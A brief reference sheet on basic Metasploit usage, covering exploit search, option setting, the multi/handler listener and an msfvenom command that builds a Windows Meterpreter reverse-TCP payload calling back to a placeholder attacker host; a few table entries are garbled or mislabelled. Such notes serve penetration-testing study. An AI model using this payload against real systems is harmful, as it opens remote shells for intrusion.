Metasploit - security

Basic Usage

# Find relevant exploits
msf6 > search type:exploit name:tomcat

# Select which one you want to use
msf6 > use <number>

# Get available options for exploit
msf6 > show options

# Then go ahead and set the relevant variables
set HttpPassword bubbles
etc...

# Then run
run
        

Commands

UsageContextDescription
msfconsoleconsoleOpen up the base console
use exploit/multi/handlermsfconsoleOpen up the base console
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_host LPORT=attacker_port -f file_type -o output_fileconsole or msfconsoleBuilds a reverse TCP exploit that, if run by the user, opens up a reverse shell for the command

msfconsole Commands

tr>
ExamplePurpose
search cve:2009Search exploits for the CVE with ID 2009